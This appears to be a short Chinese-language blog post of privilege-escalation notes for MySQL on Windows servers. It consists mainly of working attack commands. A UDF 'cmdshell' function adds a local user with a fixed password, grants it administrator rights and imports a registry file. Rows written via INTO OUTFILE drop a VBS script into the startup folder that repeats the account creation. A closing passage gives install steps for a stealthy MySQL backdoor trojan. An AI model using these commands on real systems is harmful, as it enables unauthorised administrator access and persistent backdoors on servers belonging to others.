提权整理 taro Posted on Mar 17 2021 提权 # UDF提权 利用mysql的可自建函数功能达到提权的效果,`sqlmap`的`os-shell`的原理也是如此: create function cmdshell returns string soname ’udf.dll’ select cmdshell(’net user iis_user 123!@#abcABC /add’); select cmdshell(’net localgroup administrators iis_user /add’); select cmdshell(’regedit /s d:web3389.reg’); drop function cmdshell; select cmdshell(’netstat -an’); # VBS启动项提权 create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"") " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC/add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs"; # Linx MySQL BackDoor提权 `Linx Mysql Door` Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,从而巧妙的实现了无端口,无进程,无服务的穿墙木马. 用法:将Mysql.php传到PHP服务器上,点击"自动安装Mysql BackDoor",然后直接执行命令即可 面经总结 PHP特性笔记